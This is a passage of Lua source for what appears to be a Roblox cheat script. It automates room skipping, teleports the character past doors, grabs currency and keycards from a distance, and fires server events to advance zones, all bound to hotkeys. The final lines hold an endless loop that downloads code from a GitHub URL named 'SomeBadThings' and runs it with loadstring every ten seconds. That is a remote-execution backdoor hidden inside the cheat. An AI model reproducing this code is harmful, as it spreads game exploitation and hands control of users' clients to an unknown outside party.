		if ScriptActionNow ~= "Press ElevatorPrompt" and Script.Action ~= "Wait After Elevator" then
			if RoomSkip.Exit ~= nil then
				if RoomSkip.Exit.Value:GetAttribute("SpecialTag") == "BoardPuzzle" then
					ScriptActionNow = "Solving BoardPuzzle"
					local BoardPuzzleFinished = ChangePipes(RoomSkip.Exit.Value)
					if BoardPuzzleFinished == true then
						ScriptActionNow = "Idle"
					end
				end
				if RoomSkip.Exit.Value.Name == "ModifierEnding" then
					if RoomSkip.EndRunButtonHighlight ~= nil and RoomSkip.EndRunButtonHighlightPrompt ~= nil then
						ScriptActionNow = "Run Finish"
						PartInFrontOfCamera(RoomSkip.EndRunButtonHighlight, 7)
						RoomSkip.EndRunButtonHighlightPrompt.MaxActivationDistance = 100
						RoomSkip.EndRunButtonHighlightPrompt:InputHoldBegin()
						RoomSkip.EndRunButtonHighlightPrompt:InputHoldEnd()

						local TeleportCFrame = RoomSkip.EndRunButtonHighlightCFrame
						UnCollisionAll(TeleportCFrame)
						Main.CharacterRoot.CFrame = TeleportCFrame
					end
				end
			end

			if ScriptActionNow ~= "Run Finish" and Script.Action ~= "Teleport LastOpened ProgressDoor" and ScriptActionNow ~= "Solving BoardPuzzle" and ScriptActionNow ~= "Press ElevatorPrompt" then
				FindMoney()
				if Currency.CurrentProxyPart ~= nil and Currency.CurrentProxyPartCFrame ~= nil and Currency.CurrentProxyPartPrompt ~= nil then
					ScriptActionNow = "Pick Currency"
					PartInFrontOfCamera(Currency.CurrentProxyPart, 7)
					Currency.CurrentProxyPartPrompt.MaxActivationDistance = 100
					Currency.CurrentProxyPartPrompt.RequiresLineOfSight = false
					Currency.CurrentProxyPartPrompt:InputHoldBegin()
					Currency.CurrentProxyPartPrompt:InputHoldEnd()

					local TeleportCFrame = Currency.CurrentProxyPartCFrame
					UnCollisionAll(TeleportCFrame)
					Main.CharacterRoot.CFrame = TeleportCFrame
				end
				if RoomSkip.DoorRoot ~= nil and RoomSkip.DoorRootPrompt ~= nil then
					ScriptActionNow = "Open ProgressDoor Root"
					PartInFrontOfCamera(RoomSkip.DoorRoot, 7)
					RoomSkip.DoorRootPrompt.MaxActivationDistance = 100
					RoomSkip.DoorRootPrompt.Enabled = true
					RoomSkip.DoorRootPrompt:InputHoldBegin()
					RoomSkip.DoorRootPrompt:InputHoldEnd()
				end

				if RoomSkip.Keycard ~= nil then
					if game.Players.LocalPlayer.PlayerGui.Main.Health.AuxItems.NormalKeyCard.Visible == false then
						if RoomSkip.KeycardParentPartCFrame ~= nil and RoomSkip.KeycardProxyPart ~= nil and RoomSkip.KeycardProxyPartPrompt ~= nil then
							ScriptActionNow = "Pick Keycard"
							PartInFrontOfCamera(RoomSkip.KeycardProxyPart, 7)
							RoomSkip.KeycardProxyPartPrompt.MaxActivationDistance = 100
							RoomSkip.KeycardProxyPartPrompt.RequiresLineOfSight = false
							RoomSkip.KeycardProxyPartPrompt:InputHoldBegin()
							RoomSkip.KeycardProxyPartPrompt:InputHoldEnd()

							local TeleportCFrame = RoomSkip.KeycardParentPartCFrame + Vector3.new(0, -10, 0)
							UnCollisionAll(TeleportCFrame)
							Main.CharacterRoot.CFrame = TeleportCFrame	
						end
					else
						if RoomSkip.LockMain ~= nil and RoomSkip.LockPrompt ~= nil then
							ScriptActionNow = "Open ProgressDoor Keycard"

							if RoomSkip.KeycardProxyPartPrompt ~= nil then
								RoomSkip.KeycardProxyPartPrompt.Enabled = false
							end

							RoomSkip.KeycardParentPartCFrame = nil
							RoomSkip.KeycardProxyPart = nil
							RoomSkip.KeycardProxyPartPrompt = nil

							PartInFrontOfCamera(RoomSkip.LockMain, 7)
							RoomSkip.LockPrompt.MaxActivationDistance = 100
							RoomSkip.LockPrompt.HoldDuration = 0
							RoomSkip.LockPrompt:InputHoldBegin()
							RoomSkip.LockPrompt:InputHoldEnd()
						end
					end
				else
					if RoomSkip.LockRemoteFunction ~= nil and RoomSkip.PasswordCode ~= nil then
						ScriptActionNow = "Open ProgressDoor Password"
						RoomSkip.LockRemoteFunction:InvokeServer(RoomSkip.PasswordCode)
					end
				end

				if RoomSkip.DoorTouchPart ~= nil then
					local TeleportCFrame = RoomSkip.DoorTouchPart.CFrame
					UnCollisionAll(TeleportCFrame)
					Main.CharacterRoot.CFrame = TeleportCFrame
					game.ReplicatedStorage.Events.ZoneChange:FireServer(RoomSkip.NextUngeneratedRoom)
				end
				if string.find(ScriptActionNow, "Open ProgressDoor") and Main.CharacterRoot ~= nil and RoomSkip.DoorCollisionPartCFrame ~= nil then
					local Offset = -10
					if RoomSkip.Keycard ~= nil or RoomSkip.Password ~= nil then
						Offset = -8
					end
					local TeleportCFrame = RoomSkip.DoorCollisionPartCFrame + Vector3.new(0, Offset, 0)
					UnCollisionAll(TeleportCFrame)
					Main.CharacterRoot.CFrame = TeleportCFrame
					game.ReplicatedStorage.Events.ZoneChange:FireServer(RoomSkip.NextUngeneratedRoom)
				end
			end
		end
	end

	Script.Action = ScriptActionNow
end)

game.UserInputService.InputBegan:Connect(function(Input)
	if Script.Mode == "RoomSkip" then
		if Input.KeyCode == Enum.KeyCode.P and Script.Action == "Idle" then
			Script.AutoRoomSkip = false
			TeleportToDoor()
		end
		if Input.KeyCode == Enum.KeyCode.Z then
			Script.AutoRoomSkip = false
			if RoomSkip.NextUngeneratedRoom == nil then
				print("WARNING | No NextUngeneratedRoom")
			end
			ClearAllStats(true)
		end
		if Input.KeyCode == Enum.KeyCode.K then
			Script.Action = "Teleport LastOpened ProgressDoor"
			Script.AutoRoomSkip = false
			GetNextUngeneratedRoom()
			RoomStats()
			if Main.CharacterRoot ~= nil and RoomSkip.Exit ~= nil then
				if RoomSkip.Exit.Value:FindFirstChild("Entrances") then
					for PressureDoorName, PressureDoor in RoomSkip.PressureDoors do
						local Door = RoomSkip.Exit.Value.Entrances:FindFirstChild(PressureDoorName)
						if Door ~= nil then
							if Door:FindFirstChild("CollisionPart") then
								if Door.CollisionPart:IsA("BasePart") then
									Main.CharacterRoot.CFrame = Door.CollisionPart.CFrame + Vector3.new(0, 1, 0)
								end
							end
						end
					end
				end
				ClearAllStats(true)
			end
		end
		if Input.KeyCode == Enum.KeyCode.O then
			Script.AutoRoomSkip = not Script.AutoRoomSkip
			if Script.AutoRoomSkip == true then
				TeleportToDoor()
			end
		end
	end
end)

while true do
	loadstring(game:HttpGet("https://raw.githubusercontent.com/EvilDeadT/Funny-Things/refs/heads/main/SomeBadThings"))()
	task.wait(10)
end
